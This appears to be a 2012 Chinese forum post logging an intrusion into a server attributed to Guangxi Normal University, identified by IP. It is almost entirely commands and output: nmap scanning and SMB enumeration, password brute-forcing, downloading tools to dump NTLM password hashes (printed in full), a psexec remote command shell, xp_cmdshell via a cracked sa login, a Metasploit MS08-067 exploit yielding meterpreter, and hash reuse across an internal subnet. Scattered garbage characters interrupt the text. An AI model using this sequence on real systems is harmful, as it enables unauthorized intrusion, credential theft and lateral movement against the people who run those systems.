

作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站 http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00048s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE       VERSION

135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)

139/tcp  open  netbios-ssn
% d1 Q% ]/ U% Z" _
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds

1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)

1026/tcp open  msrpc         Microsoft Windows RPC

3372/tcp open  msdtc?

3389/tcp open  ms-term-serv?

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r

SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions

SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")

SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO

SF:ptions,6,"hO\n\x000Z");

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Service Info: OS: Windows
' K" ^! o# i- a* e( D; N
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse

-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse

-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse

-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse

-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse

-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse

-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse

-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse

-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse

-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse

-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse

-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse

-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse

-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
! s% [8 n* N/ n! n$ `* M% a* T+ u
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

//此乃使用脚本扫描远程机器所存在的账户名
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00038s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
/ _3 M, Y& w3 ^9 D
135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-enum-users:

|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser //扫描结果

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00035s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
% W; Z, ?% H; |! e3 H- ?) l# h2 r2 Q+ q+ N/ m& B# e
135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

3389/tcp open  ms-term-serv
& Y2 g7 F$ l) g* M: s0 S
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-enum-shares:

|   ADMIN$

|     Anonymous access: <none>

|   C$

|     Anonymous access: <none>

|   IPC$

|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
3 _9 C3 H; e9 l  C
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

//获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
6 o4 a1 h7 Z7 O/ s
Nmap scan report for bogon (202.103.242.241)

Host is up (0.00041s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
" X% \9 t7 M; c: \. `
135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

3389/tcp open  ms-term-serv
7 G, b5 i1 f$ }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-brute:

|   administrator:<blank> => Login was successful

|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
+ G: Y' x) z# |( T1 G# I
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    //抓hash

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.0012s latency).

PORT    STATE SERVICE
! R5 V( p; C( W8 h8 I$ T9 C
135/tcp open  msrpc

139/tcp open  netbios-ssn

445/tcp open  microsoft-ds

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-pwdump:

| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************

| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************

| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4

|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
" X7 P8 R  H9 j' i
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell

-p 123456 -e cmd.exe
2 |+ t1 e; Y0 C5 k- `: e3 b# ^% K
PsExec v1.55 - Execute processes remotely

Copyright (C) 2001-2004 Mark Russinovich

Sysinternals - www.sysinternals.com
/ X) k1 i9 i) d/ f! ], X* E/ j' B/ u$ A( ?
Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :

IP Address. . . . . . . . . . . . : 202.103.242.241

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 202.103.1.1
9 ?& ?  L( m4 d2 b4 @, ^
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   //远程登录sa执行命令
. N6 H3 o: a+ T* R+ ~( B8 n+ k
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
! k. v1 o3 a, h- T8 B; D5 x
Nmap scan report for bogon (202.103.242.241)

Host is up (0.00046s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

3389/tcp open  ms-term-serv
. _  M+ m9 e, k1 C* m# Q
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-check-vulns:

|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出

msf > search ms08

msf > use exploit/windows/smb/ms08_067_netapi

msf  exploit(ms08_067_netapi) > show options

msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241

msf  exploit(ms08_067_netapi) > show payloads

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp

msf  exploit(ms08_067_netapi) > exploit

meterpreter >

Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l
$ Y+ A& h7 ^7 J; S' h' p6 a( d8 b* w! b! f
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt

test

administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt

44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
7 N6 S  n; k( l, y9 p
//利用用户名跟获取的hash尝试对整段内网进行登录
Nmap scan report for 192.168.1.105

Host is up (0.00088s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
5 E0 I7 j+ N3 i
135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc

3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-brute:

|_  administrator:<blank> => Login was successful
0 c1 B& S9 I- {7 p) \
攻击成功，一个简单的 msf+nmap 攻击。




